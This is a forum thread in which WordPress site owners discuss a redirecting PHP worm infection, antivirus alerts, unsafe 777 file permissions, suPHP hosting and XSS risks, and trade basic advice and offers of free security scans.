      edit: This kind of thing, being a simple PHP "worm" and not a rootkit or anything like that, should never be able to spread from one hosting account to another on a server like that unless there was some kind of permissions problem (maybe it found something with 777 permissions and spread that way?). I'd recommend hosting on a server that uses PHPSuExec or SUPHP so you have no reason to ever leave any file permissions wide open like that. Now that I've been with HostGator for a couple months I couldn't imagine hosting with anyone that allowed or required 777 permissions.. lol
      Signature

      This signature intentionally left blank.

      {{ DiscussionBoard.errors[878917].message }}
      • Profile picture of the author ebuyer123
        Originally Posted by stevenh512 View Post

        I'd recommend hosting on a server that uses PHPSuExec or SUPHP so you have no reason to ever leave any file permissions wide open like that....I couldn't imagine hosting with anyone that allowed or required 777 permissions.. lol
        Hi, Steven

        Can you long story cut short and just give us a LIST of these secure hosting companies that are affordable and reliable for WP users inparticular?

        Or you may want to put up a WSO for selling such a list.

        Thanks?
        {{ DiscussionBoard.errors[880045].message }}
  • Profile picture of the author GarrieWilson
    It wasnt the other site unless avast checks by IP to.
    Signature
    Screw You, NameCheap!
    $1 Off NameSilo Domain Coupons:

    SAVEABUCKDOMAINS & DOLLARDOMAINSAVINGS
    {{ DiscussionBoard.errors[876984].message }}
    • Profile picture of the author Jeremy Kelsall
      You very well could have just stumbled onto a site that was infected or even stuffing cookies...I know my avast goes nuts whenever I go to a site that is cookie stuffing

      Also, when I am doing some automated blog commenting I get some alerts from avast too when doing the commenting strictly on wordpress blogs...
      {{ DiscussionBoard.errors[876988].message }}
      • Profile picture of the author rosetrees
        Amid all the mud slinging here, my previous post was ignored. Looks like I wasn't so far wrong.

        (My computer was attacked by something a few weeks ago when I was on the website of a local boarding school. I don't blame the site, and returning to it on another computer produced nothing. Just coincidence.

        As you probably realise, I don't have the technical knowledge of many on here. I just assume that some of these attacks happen via a server somehwere - either the ISP or another link in the chain.)
        {{ DiscussionBoard.errors[877227].message }}
        • Profile picture of the author HeySal
          Originally Posted by rosetrees View Post

          Amid all the mud slinging here, my previous post was ignored. Looks like I wasn't so far wrong.

          (My computer was attacked by something a few weeks ago when I was on the website of a local boarding school. I don't blame the site, and returning to it on another computer produced nothing. Just coincidence.

          As you probably realise, I don't have the technical knowledge of many on here. I just assume that some of these attacks happen via a server somehwere - either the ISP or another link in the chain.)

          Yes - a coincidence - but an unsettling one at the very least. I have heard others talk about false positives - but this is really a whole new thing - not only did the alarm go off - the URL was related to the site I was on -- AND - I WAS hit by a virus so I actually wasn't being warned falsely. Had the Virus URL not been a wordpress look-alike I wouldn't have been so positive that it came from there.


          Michael - The problem HAS been fixed on the server, by a very dilligent Host Admin. Dave chose a responsible host. I wish I had done the same when I put up my main website - they just told me it's my problem.

          I don't think this is a waste of time - this is one nasty virus and its stealth is staggering. It appears that the codes that are used are encrypted. There are many questions about how it is getting in. This incidence was a "neighboring site on the host", on my main site it was a hacker that signed for membership - a live person. With the escalation of the infection I think its important that we find out just what is going on. Updated etc are good things, but from what I have seen in research, it isn't fool proof.
          Also - what are the different hosts doing about it? I sure don't want to get stuck on a server that won't help fix such a virulent problem. Anything we can figure out here that helps prevent the spread or saves our sites is a good thing.
          Signature

          Sal
          When the Roads and Paths end, learn to guide yourself through the wilderness
          Beyond the Path

          {{ DiscussionBoard.errors[878028].message }}
  • Profile picture of the author Ut
    I just wanted to say thanks much for Sal & everyone contributed to this thread.

    Originally Posted by HeySal View Post

    I don't think this is a waste of time
    No, its not. Everything happens for a reason and we learn from every situation we are placed in. Nothing wasted.

    Thanks again everyone!
    {{ DiscussionBoard.errors[878349].message }}
  • Profile picture of the author stevenh512
    I don't exactly have a "list" but I know kiosk.ws (the host Mike Filsaime recommends and uses) and HostGator both run PHP under a suexec environment (PHPSuExec or SUPHP) so the script actually runs as "you" and not as "apache" or "nobody" (or whatever apache's account name is on that particular server). In that environment, there's no need for 777 permissions, your scripts (Wordpress or whatever else) will be able to write to their files when they need to and nobody on any other account will have write access.. so short of a rootkit it would be impossible for this kind of worm to spread from one account to another on the same server. Of course the drawback is if your own account gets hit it'll spread through your account like wildfire, but at least you only have to worry about the security of the scripts on your own account and not everyone else's.

    So, my "short list" would be Kiosk and HostGator, I'm sure there are plenty of others. Before buying hosting I'd contact their support and ask them about it. Aside from learning whether or not their server supports running PHP scripts in a suexec environment, you'll also get a good idea of how their support people respond to questions (which is reall good to know if you ever need them lol).
    Signature

    This signature intentionally left blank.

    {{ DiscussionBoard.errors[880428].message }}
  • Profile picture of the author Peggy Baron
    I had a weird thing happen today to one of my WP blogs. Well, maybe it wasn't today but I noticed it today.

    Under the settings, membership was changed to yes "to anyone can register" and yes to "users must be logged in and registered to comment".

    Also, the new user default mode was changed to "subscriber" rather than "administrator" as it should be. That meant anyone who registered could access my dashboard.

    I just installed Peter's recommendations and will check everything. I would guess it's been hacked though.

    Will changing the permissions from 777 screw anything up?

    Thanks,
    Peggy
    {{ DiscussionBoard.errors[885895].message }}
    • Profile picture of the author MizzCindy
      Originally Posted by Peggy Baron View Post

      ...Also, the new user default mode was changed to "subscriber" rather than "administrator" as it should be. That meant anyone who registered could access my dashboard...
      Wait, I think you want your new users to only be 'subscribers'. That's the lowest level of permissions provided in the codex. You definitely do not want them to be 'administrators'. Or am I misunderstanding?

      Roles and Capabilities WordPress Codex

      Cindy
      {{ DiscussionBoard.errors[885930].message }}
      • Profile picture of the author Wade Watson
        The proliferation of javascript and the other client side scripting used by web pages has really become of the great absurdities/plagues of the an otherwise great medium. The Internet will never become a stable form of communication until this stuff is dealt with-- but I'm not sure how. I'm constantly dismayed to see javascript used where server side scripting would have worked. But as long as there are lazy programmers, gullible clients and virus pervayors there will be problems like this.
        {{ DiscussionBoard.errors[886027].message }}
    • Profile picture of the author HeySal
      Originally Posted by Peggy Baron View Post


      Will changing the permissions from 777 screw anything up?

      Thanks,
      Peggy
      Peggy, I'm not a tech -but I know that you should NEVER have permissions set at 777 - post your blog url and I'll see if it sets my avast off to view it.
      Signature

      Sal
      When the Roads and Paths end, learn to guide yourself through the wilderness
      Beyond the Path

      {{ DiscussionBoard.errors[886059].message }}
      • Profile picture of the author Peggy Baron
        Originally Posted by HeySal View Post

        Peggy, post your blog url and I'll see if it sets my avast off to view it.
        Thanks Sal, it's here.

        Peggy
        {{ DiscussionBoard.errors[887179].message }}
    • Profile picture of the author ThomM
      Originally Posted by Peggy Baron View Post

      I had a weird thing happen today to one of my WP blogs. Well, maybe it wasn't today but I noticed it today.

      Under the settings, membership was changed to yes "to anyone can register" and yes to "users must be logged in and registered to comment".

      Also, the new user default mode was changed to "subscriber" rather than "administrator" as it should be. That meant anyone who registered could access my dashboard.

      I just installed Peter's recommendations and will check everything. I would guess it's been hacked though.

      Will changing the permissions from 777 screw anything up?

      Thanks,
      Peggy
      Peg 2 things.
      First the default user mode should be subscriber like Cindy said.
      As a subscriber about all they can do is comment they can't get into the admin area.
      Second change your folder permissions to 755. 777 is so scripts can write to the folder. Also if you have any files with the permissions set to 666 change them to 644 for the same reason. Depending oon your hosting, you may need to change your theme files permission's to 666 to edit the theme files in WP. If you do change them back to 644.
      Third those membership settings aren't bad really. All it means is if someone want's to comment on a post they must be a registered user. I don't think alot of spammers will take the time to register especially when you can simply delete them.
      OK three things
      Signature

      Life: Nature's way of keeping meat fresh
      Getting old ain't for sissy's
      As you are I was, as I am you will be
      You can't fix stupid, but you can always out smart it.

      {{ DiscussionBoard.errors[886086].message }}
      • Profile picture of the author jlxsolutions
        Well after reading this i thought i might as well end the worries if anyone is wondering if their sites are insecure.
        Send me a private message whit the site adress.
        And i,ll do a security scan on it and give you a list if anything needs to be fixed.
        and yes free it won't occupy my time much anyways.
        I,m new here and might as well provide something positive for the community.
        sincerly jan lukkarinen owner of jlxsolutions


        p.s lol that sounded official
        {{ DiscussionBoard.errors[886110].message }}
      • Profile picture of the author Peggy Baron
        Originally Posted by ThomM View Post

        Peg 2 things.
        First the default user mode should be subscriber like Cindy said.
        As a subscriber about all they can do is comment they can't get into the admin area.
        When they were set as I posted above, it allowed a person to subscribe and then it allowed them into my dashboard. Definitely not what I want!
        When I change it back to Administrator, then they can only comment and I can reply as admin.

        I can't figure out how they were recently changed when I didn't do it.

        Peggy
        {{ DiscussionBoard.errors[887195].message }}
  • Profile picture of the author lakeview
    Peggy,

    I have all folders at 755 and files at 644 and WP works fine. I'm no expert by any means, but I don't think you should have any folders at 777 so I would change that immediately. I also recommend Peter's suggestion with running the exploit scanner.

    Angela
    {{ DiscussionBoard.errors[885921].message }}
  • Profile picture of the author ECS Dave
    The hosting provider that I have the account on has in place
    something that limits the permissions to 755, but I am told that
    if 777 is needed the machine "knows" to allow the calling script
    to that level of access...

    From the support team:
    - Late last year, we added suPHP - a much more secure PHP
    foundation software that does not allow 777 permissions on any
    file or folder.

    It does allow you to set permissions at 755 and they will act as
    777, but more securely. If that didn't make sense, don't worry
    about it. Just know it's important to protect your accounts from
    hacks.

    - Server-level security at our data center can't get much
    stronger without causing your scripts to no longer function. Our
    data center is successfully repelling 1000s of attacks each day.

    - The next step is to turn on Secure FTP. That's a pretty big
    change. And it may mean that you need to get an FTP program or
    service that allows SFTP to access your accounts. (Think of it as
    having an extra strong door between you and your servers.)
    As previously mentioned:
    Originally Posted by stevenh512 View Post

    This kind of thing, being a simple PHP "worm" and not a rootkit or anything like that, should never be able to spread from one hosting account to another on a server like that unless there was some kind of permissions problem (maybe it found something with 777 permissions and spread that way?). I'd recommend hosting on a server that uses PHPSuExec or SUPHP so you have no reason to ever leave any file permissions wide open like that. Now that I've been with HostGator for a couple months I couldn't imagine hosting with anyone that allowed or required 777 permissions.. lol

    Before buying hosting I'd contact their support and ask them about it. Aside from learning whether or not their server supports running PHP scripts in a suexec environment, you'll also get a good idea of how their support people respond to questions (which is reall good to know if you ever need them lol).
    asking "pre-sales" questions is an excellent idea, do NOT just rely on the "sales page" of the host...

    Be Well!
    ECS Dave
    {{ DiscussionBoard.errors[886079].message }}
  • Profile picture of the author ebuyer123
    Originally Posted by kanus View Post

    I'm still not clear on exactly how it affected you? It wiped out PHP on your server?
    It will redirect or sent you to another webpage.

    Example, when you click on yahoo.com and you ended up at CheapHottBabe4uuTonight.com
    {{ DiscussionBoard.errors[886660].message }}
  • Profile picture of the author Peter Bestel
    A sad post script to this story

    I've got a friend who asked me to tell him about IM a few months ago and he was tentatively dipping his toe into having a web presence. We set him up with a blog, he joined WF and was enjoying Twitter. We were working on getting him a static site too to hopefully become his main source of income. He's got an offline business which could easily transfer to being online.

    His PC and blog got attacked by this virus/trojan and he's been battling with it for about 3 weeks. Because he didn't have the skills to act quickly enough his blog address is now flagged up as an attack site by Google and even his Twitter account has been suspended for suspicious activity. (Presumably because of the link to his blog in his profile)

    He spoke to me yesterday and has decided that, if this is what it's going to be like being an Internet Marketer he doesn't want the hassle. He's decided to cut his losses and forget all about making money online.

    Before you go judging him, imagine for a moment you were learning to drive. Nervous about the whole experience you approach your first junction. You gingerly ease out and WHAM! You're hit by a juggernaut. You survive, but you're obviously shaken. You decide to repair everything and venture out once more, only to be hit again - by the same juggernaut.

    When this happens more than three times you could forgive them for not wanting to drive again. His experience has only been negative.

    Peter
    {{ DiscussionBoard.errors[886709].message }}
  • Profile picture of the author HeySal
    Originally Posted by kanus View Post

    I'm still not clear on exactly how it affected you? It wiped out PHP on your server?
    When my main site was attacked months back it was attacked via a member who was a hacker. There was a lot more going on with that than just having the virus loaded on there, so yeah, everything php is disabled and host files were yanked. We aren't using mysql at all and php is just toast. The virus was just the icing on the cake. The hacker was a nightmare, but that virus just got into everything and anything that wasn't html once it was let loose in there. Each page that was on a php program was infected. My tech could have fixed it in time, but he's no longer online.
    It was over 1000 pages so it is just easier to start over from scratch.

    The instance I just reported - was a normal instance of the virus and just hit us, coincidentally, when I was browsing the WP themes for a new blog, and avast showed a URL for the virus that said http://wordpress..../install/..... so I thought it CAME FROM the wp site. Dave's host told him that it came from a different site on that server and they were able to clean it all up. But It was caught right at the instant it hit my site and wasn't able to get far at all. We were on it too quick for it to do much but land.

    I don't know what it will do if not detected quick (if you don't have a hacker in your site). It's a worm. I know that the one that hits personal computers eventually delievers a root kit if it's not dealt with quickly, but not sure if the one that hits websites is the same one.
    I also know that a lot of anti-virus programs fail to detect it and that it also knows how to protect itself from detection - and that it can be a real bear to completely get rid of. Sites like Major Geeks are probably better places to go for info about it than I can give you.

    When I said that it attacks 777 permission programs -- I meant it will infect programs that have the capability of 777 permissions. I'm not sure which of the actual permissions that you can set those programs to are safe and which aren't or if any are completely safe - I just know it's those programs which can be infected. I have always been told - in fact I think it was even said in this thread, that you shouldn't have permissions set at 777. So all I was saying - is that if you are infected, the programs that have those types of permissions at all are the ones you want to check for infection first, I wasn't saying anything about the particular settings. People seem to think this is just a WP virus, and it's not - it gets forums, etc, too.

    I hope that clears up some confusion.
    Signature

    Sal
    When the Roads and Paths end, learn to guide yourself through the wilderness
    Beyond the Path

    {{ DiscussionBoard.errors[887030].message }}
  • Everyone running any kind of website should be on guard against cross-site scripting (XSS) attacks. Once you fall for one of those, it doesn't matter if you're using top-secret ultra-secure Pentagon blogging software -- you're vulnerable.

    Protect Against XSS Attacks | Charles Linart

    The site hackers have been extremely active lately. All those guys gloating above about how secure their sites are will find out soon enough.
    Signature
    {{ DiscussionBoard.errors[887143].message }}
    • Profile picture of the author HeySal
      Originally Posted by SurviveUnemployment View Post

      Everyone running any kind of website should be on guard against cross-site scripting (XSS) attacks. Once you fall for one of those, it doesn't matter if you're using top-secret ultra-secure Pentagon blogging software -- you're vulnerable.

      Protect Against XSS Attacks | Charles Linart

      The site hackers have been extremely active lately. All those guys gloating above about how secure their sites are will find out soon enough.
      Wow - you hit the nail on the head. That's what I have been trying to tell people - my first site was a freakin' fortress. My tech works contracts doing security on gov computers. Not only were those hacked (not just the one he was working) but his own computer was hit at the bios level, uh..hello. He said it took the member months to hack into us after he landed. That's why we're torn to crap right now. What I got the other day was just the average redirect, but those are still nasty as heck.

      On RHS1 we did everything the guy in your article suggested.....and it wasn't enough.

      I've seen some boasting going on about how secure they are and others must be stupid to get a virus..........and I think about how I was feeling about RHS1.....before the hacker got us. It wasn't that I knew how to secure it...but I know my tech is one of the best and in the long run it didn't matter a twat. I hadn't even had a spammer on the site in over 2 years. Was pretty cocky about it. Lesson learned to the tune of 4 years of work on a site.
      Signature

      Sal
      When the Roads and Paths end, learn to guide yourself through the wilderness
      Beyond the Path

      {{ DiscussionBoard.errors[887174].message }}
    • Profile picture of the author Bamma
      Originally Posted by SurviveUnemployment View Post

      Everyone running any kind of website should be on guard against cross-site scripting (XSS) attacks. Once you fall for one of those, it doesn't matter if you're using top-secret ultra-secure Pentagon blogging software -- you're vulnerable.

      Protect Against XSS Attacks | Charles Linart

      The site hackers have been extremely active lately. All those guys gloating above about how secure their sites are will find out soon enough.
      I gloat for good reason.
      I now how it works.
      I know the precautions to take.

      A few years ago I was on the other team and I know the exploits and how to do them and how to protect against them.

      People running around like chicken little are the ones these guys bank on.

      A good Av and real time scanner and common sense WILL protect you.

      They cant get in unless you give them the keys in the form of weak AV,
      5 year old scripts
      weak passwords
      running warez even "harmless nulled php scripts"

      XSS has been around for years and is nothing new.

      Someone will not spend months hacking a blasted blog there is no money in it for them.

      and bios problems ... well not even going to go there sounds like someone from a random IRC convo


      anyway I am going to bow out and if someone does get the problem and wants the site cleaned up contact me have plenty of experience with NO recurrences.
      {{ DiscussionBoard.errors[887308].message }}
  • Profile picture of the author HeySal
    Peggy - don't know anything about settings as I stressed a couple of posts ago, but -- your blog isn't setting off my avast alarms. I clicked about 4 or 5 pages and got nothing but website.
    Signature

    Sal
    When the Roads and Paths end, learn to guide yourself through the wilderness
    Beyond the Path

    {{ DiscussionBoard.errors[887247].message }}
  • Profile picture of the author k8spy8
    I have never fall into such situation really appreciate that you share with us. I wanna know if the similar things happens to me what should I do and how harmful this virus is can anyone tell me?
    {{ DiscussionBoard.errors[887248].message }}
    • Profile picture of the author jlxsolutions
      Well as i gathered so far this is not a virus.
      Basically what i can tell from this is that a hacker exploited a security hole inserted a XSS attack on the website and redirected the webpage to a malicius one.
      And what ever comes from there is still unknown.
      {{ DiscussionBoard.errors[887324].message }}
  • Profile picture of the author marcus passey
    Interesting stuff

    Marcus
    Signature
    Watch me finally make money this year now I have a mentor follow my journey at www.marcuspassey.com

    Are you building a list? get my FREE report on list building CLICK HERE!
    {{ DiscussionBoard.errors[887330].message }}
    • Profile picture of the author jlxsolutions
      Intresting indeed. Well due to the fact i do security checks daily and make sure ppls websites and computers are safe from the bad guys i have come to the conclusion that even mostly the user gets blamed the reason most often lies whit the host not the user.
      Like un updated server software for example.
      If anyone is willing to give me permission to scan their website.
      i can show some exampels.
      {{ DiscussionBoard.errors[887381].message }}
  • Profile picture of the author jlxsolutions
    To the person who PM'ed me sure i do the scan
    i,ll post the results here and as you wanted to be anonymous i,ll leave the webpage in question unmentioned. P.S cant reply to your PM until i have 15 posts lol
    {{ DiscussionBoard.errors[887710].message }}
  • Profile picture of the author jlxsolutions
    Well due to the fact you wanted to be anonymous i think i wont post report at all in here
    would be to much work to edit the results.
    but one thing was for sure the hostgator had some issues wich needed urgent attention.
    {{ DiscussionBoard.errors[888673].message }}

Trending Topics